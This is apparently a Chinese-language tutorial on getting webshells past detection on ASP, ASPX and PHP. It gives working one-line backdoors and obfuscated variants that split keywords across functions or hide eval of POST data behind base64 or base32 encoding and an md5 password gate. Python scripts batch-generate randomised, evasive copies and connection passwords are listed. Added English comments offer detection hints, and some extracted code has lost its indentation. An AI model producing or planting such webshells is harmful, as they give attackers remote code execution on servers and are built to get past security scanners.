ASP绕过
相比于 PHP,ASP 就不那么灵活了:许多编码函数不自带,注释也无法隔断函数关键字与括号。
但是依然有不少方法可以绕过
首先asp的一句话木马如下:
<%execute(request("x"))%>
使用函数分割关键字
<%
' Same request-to-Execute data flow as the one-liner above, split across two
' functions: b() returns the request parameter "x" and a() passes that value
' to Execute. VBScript keywords are case-insensitive, so "eXecUTe" is Execute.
' Detection note: match Execute case-insensitively and follow the value
' through the wrapper function; a pattern that expects execute(request(...))
' in a single expression does not match this layout.
Function b():
b = request("x")
End Function
Function a():
eXecUTe(b())
End Function
a()
%>
连接密码:x
批量脚本
import random
# Template for the split-function ASP page shown above. str.format fills
# {0} (name of the function that returns the request value), {1} (request
# parameter name) and {2} (name of the function that calls Execute).
# Only those three identifiers differ between outputs; the
# Function / request(...) / execUte(...) skeleton is emitted verbatim every
# time, so the skeleton rather than the names is the stable thing to match on.
# NOTE(review): unlike the hand-written sample, this template wraps the
# functions in <!-- --> lines; how the ASP engine treats them is not shown
# on the page.
shell = '''<%
<!--
Function {0}():
{0} = request("{1}")
End Function
Function {2}():
execUte({0}())
End Function
{2}()
-->
%>'''
# Return `len` distinct uppercase ASCII letters joined into one string.
# random.sample draws without replacement, so no letter repeats within a name
# and asking for more than 26 characters raises ValueError.
# The parameter `len` and the local `str` shadow the builtins of the same
# name inside this function.
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str, len))
# Fill the ASP template with three generated 4-letter names and return the
# resulting page text. The second name becomes the request parameter the page
# reads; presumably that is the value the article labels the connection
# password under the script.
def build_webshell():
FunctionName = random_name(4)
parameter = random_name(4)
FunctionName1 = random_name(4)
shellc = shell.format(FunctionName, parameter, FunctionName1)
return shellc
# Script entry point: print one generated page to stdout.
if __name__ == '__main__':
print(build_webshell())
连接密码:VXAE
ASPX
其实原理是一样的,同样使用函数分割关键字
将 Request.Form["pureqh"] 和 unsafe 分割为两份,使用两个函数拼接
<%@ Page Language="Jscript" Debug=true%>
<%
// The form field "pureqh" is read into a and returned by fun(); fun1() passes
// that value to eval together with d. d is "unsa" + "fe", so the second eval
// argument is the string "unsafe" without that literal appearing in the file.
// Detection note: the sink is still eval() on Request.Form data; a search for
// the literal "unsafe" alone misses this layout, so the rule has to follow
// the value through fun() and the concatenation.
var a=Request.Form["pureqh"];
var b="unsa",c="fe",d=b+c;
function fun()
{
return a;
}
function fun1()
{
eval(fun(),d);
}
fun1()
%>
批量脚本:
import random
# Template for the ASPX/JScript page shown above. Fields 0-5 are variable and
# function names; fields 6 and 7 are the literal braces that build_webshell
# passes in as `lef` and `rig`.
# The form field name "pureqh" and the "unsa"/"fe" halves are literals in the
# template, so they are identical in every generated page.
# NOTE(review): in this copy each format field is split across two lines
# ("{" on one line, the index on the next); that looks like an extraction
# artifact rather than the author's original layout.
shell = '''<%@ Page Language="Jscript" Debug=true%>
<%
var {
0}=Request.Form["pureqh"];
var {
1}="unsa",{
5}="fe",{
4}={
1}+{
5};
function {
2}()
{
6}
return {
0};
{
7}
function {
3}()
{
6}
eval({
2}(),{
4});
{
7}
{
3}()
%>'''
# Return `len` distinct uppercase ASCII letters joined into one string.
# random.sample draws without replacement, so no letter repeats within a name
# and asking for more than 26 characters raises ValueError.
# The parameter `len` and the local `str` shadow the builtins of the same
# name inside this function.
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
# Fill the ASPX template and return the page text. Six names are generated,
# each role with its own fixed length (2 through 7 letters), and are passed to
# str.format in the order the template's field indices expect.
# The braces are supplied as ordinary values (`lef`, `rig`) because literal
# braces in the template would be read by str.format as field delimiters.
def build_webshell():
parameter = random_name(2)
parameter1 = random_name(3)
FunctionName = random_name(4)
FunctionName1 = random_name(5)
parameter2 = random_name(6)
parameter3 = random_name(7)
lef = '''{'''
rig = '''}'''
shellc = shell.format(parameter,parameter1,FunctionName,FunctionName1,parameter2,parameter3,lef,rig)
return shellc
# Script entry point: print one generated page to stdout.
if __name__ == '__main__':
print (build_webshell())
连接密码:pureqh
PHP
一句话木马:
<?php @eval($_POST('a'));?>
<?php
// The constructor body runs only when md5 of the GET parameter "pass" equals
// the hard-coded digest (compared with loose ==). It then joins two base64
// fragments held in separate properties, decodes the result and eval()s it
// between two comment strings. Joined, the fragments decode to an eval of a
// POST parameter, so that statement never appears in the file in clear text.
// Detection note: eval() fed by base64_decode() output, together with
// @-suppressed errors, is the indicator here; the class and property names
// carry no meaning.
class BTAG{
public $QOMYW = null;
public $XGTCPL = null;
public $YIOXAL = null;
function __construct(){
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
$this->QOMYW = 'ZXZhbCgkX1BPU';
$this->YIOXAL = '1RbYV0pOw==';
$this->XGTCPL = @base64_decode($this->QOMYW.$this->YIOXAL);
@eval("/*#`|W$~Q*/".$this->XGTCPL."/*#`|W$~Q*/");
}}}
new BTAG();
?>
使用base32处理eval($_POST[zero]);
<?php
// Same gate as the base64 variant (md5 of GET "pass" against a fixed digest),
// but the payload is a lowercase base32 string. It is decoded by the
// base32_decode() defined further down in this file and passed to eval().
// A /* */ comment sits between "eval" and "(", and the decoded code is
// wrapped in comment strings.
// $this->LGZOJH is not among the declared properties ($a, $b, $c); it is
// created on assignment.
// Detection note: the invariant is eval() of the output of a decoder that is
// defined in the same file, whatever the decoder is called.
class ZQIH{
public $a = null;
public $b = null;
public $c = null;
function __construct(){
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){
$this->a = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->LGZOJH = @base32_decode($this->a);
@eval/*sopupi3240-=*/("/*iSAC[FH*/".$this->LGZOJH."/*iSAC[FH*/");
}}}
new ZQIH();
// Encode a byte string as base32 using the lowercase alphabet a-z, 2-7 and
// no "=" padding. Bits are accumulated in $v; each time 5 or more bits are
// available one character is emitted, and a trailing partial group is
// left-shifted to a full 5 bits before its character is emitted.
// Not called anywhere in this listing.
// NOTE(review): presumably it was used offline to produce the blob stored in
// the class above - confirm.
function base32_encode($input) {
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
$output = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($input); $i < $j; $i++) {
$v <<= 8;
$v += ord($input[$i]);
$vbits += 8;
while ($vbits >= 5) {
$vbits -= 5;
$output .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);
}
}
if ($vbits > 0) {
$v <<= (5 - $vbits);
$output .= $BASE32_ALPHABET[$v];
}
return $output;
}
// Decode the lowercase, unpadded base32 form produced by base32_encode.
// a-z map to 0-25 and the digits 2-7 map to 26-31 (24 plus the digit's
// numeric value); one byte is emitted for every 8 accumulated bits.
// Any other character, including uppercase letters and "=", ends the script
// through exit(1). Bits left over at the end of the input are discarded.
// Triage note: the symbol order is the same as the RFC 4648 base32 alphabet,
// so an embedded blob can be inspected offline with a standard decoder after
// upper-casing it and padding it with "=" to a multiple of 8 characters.
function base32_decode($input) {
$output = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen($input); $i < $j; $i++) {
$v <<= 5;
if ($input[$i] >= 'a' && $input[$i] <= 'z') {
$v += (ord($input[$i]) - 97);
} elseif ($input[$i] >= '2' && $input[$i] <= '7') {
$v += (24 + $input[$i]);
} else {
exit(1);
}
$vbits += 5;
while ($vbits >= 8) {
$vbits -= 8;
$output .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);
}
}
return $output;
}
?>
连接密码:zero
批量代码
import random
# Template for the base32 PHP page shown above. Format fields: {0} class name,
# {1} and {4} the literal braces, {2} and {3} property names, {5} the quoted
# /*...*/ string placed on both sides of the decoded code, {6} and {9} the
# encoder and decoder function names, {7} their parameter, {8} their output
# variable.
# Everything else is emitted verbatim in every output: the md5 digest, the
# base32 blob, $BASE32_ALPHABET and its value, and the locals $v, $vbits,
# $i and $j.
# Detection note: those verbatim parts, plus eval() of a string decoded by a
# function defined in the same file, stay matchable when the identifiers are
# randomised.
shell = '''<?php
class {0}{1}
public ${2} = null;
public ${3} = null;
function __construct(){1}
if(md5($_GET["pass"])=="df24bfd1325f82ba5fd3d3be2450096e"){1}
$this->{2} = 'mv3gc3bierpvat2tkrnxuzlsn5ossoy';
$this->{3} = @{9}($this->{2});
@eval({5}.$this->{3}.{5});
{4}{4}{4}
new {0}();
function {6}(${7}){1}
$BASE32_ALPHABET = 'abcdefghijklmnopqrstuvwxyz234567';
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 8;
$v += ord(${7}[$i]);
$vbits += 8;
while ($vbits >= 5) {1}
$vbits -= 5;
${8} .= $BASE32_ALPHABET[$v >> $vbits];
$v &= ((1 << $vbits) - 1);{4}{4}
if ($vbits > 0){1}
$v <<= (5 - $vbits);
${8} .= $BASE32_ALPHABET[$v];{4}
return ${8};{4}
function {9}(${7}){1}
${8} = '';
$v = 0;
$vbits = 0;
for ($i = 0, $j = strlen(${7}); $i < $j; $i++){1}
$v <<= 5;
if (${7}[$i] >= 'a' && ${7}[$i] <= 'z'){1}
$v += (ord(${7}[$i]) - 97);
{4} elseif (${7}[$i] >= '2' && ${7}[$i] <= '7') {1}
$v += (24 + ${7}[$i]);
{4} else {1}
exit(1);
{4}
$vbits += 5;
while ($vbits >= 8){1}
$vbits -= 8;
${8} .= chr($v >> $vbits);
$v &= ((1 << $vbits) - 1);{4}{4}
return ${8};{4}
?>'''
# Return `len` distinct characters drawn without replacement from a pool of
# punctuation and ASCII letters. build_webshell places the result between
# "/*" and "*/" to form the filler string wrapped around the decoded code.
# The parameter `len` and the local `str` shadow the builtins of the same
# name inside this function.
def random_keys(len):
str = '`~-=!@#$%^&_+?<>|:[]abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
# Return `len` distinct uppercase ASCII letters joined into one string.
# random.sample draws without replacement, so no letter repeats within a name
# and asking for more than 26 characters raises ValueError.
# The parameter `len` and the local `str` shadow the builtins of the same
# name inside this function.
def random_name(len):
str = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
return ''.join(random.sample(str,len))
# Fill the PHP template and return the page text. Seven 4-letter names are
# generated (class, two properties, encoder, its parameter, its output
# variable, decoder), plus one 7-character filler wrapped as a double-quoted
# "/*...*/" string.
# The braces are supplied as ordinary values (`lef`, `rig`) because literal
# braces in the template would be read by str.format as field delimiters.
# The md5 digest and the base32 blob are not arguments here; they come from
# the template unchanged.
def build_webshell():
className = random_name(4)
lef = '''{'''
parameter1 = random_name(4)
parameter2 = random_name(4)
rig = '''}'''
disrupt = "\"/*"+random_keys(7)+"*/\""
fun1 = random_name(4)
fun1_vul = random_name(4)
fun1_ret = random_name(4)
fun2 = random_name(4)
shellc = shell.format(className,lef,parameter1,parameter2,rig,disrupt,fun1,fun1_vul,fun1_ret,fun2)
return shellc
# Script entry point: print one generated page to stdout.
if __name__ == '__main__':
print (build_webshell())
连接密码:zero
这里附上我之前收录的一个样本:
<?php
// eval() of the value returned by get(), which is the raw POST field
// "password"; the empty strings concatenated on both sides do not change it.
// get() is called before its definition, which PHP allows for functions
// declared unconditionally at top level.
// Detection note: the POST read and the eval() sink sit in different
// statements, so a rule has to connect them through the function call
// rather than expect both in one expression.
@eval('' . get() . '');
function get()
{
$get = $_POST['password'];
return $get;
}
?>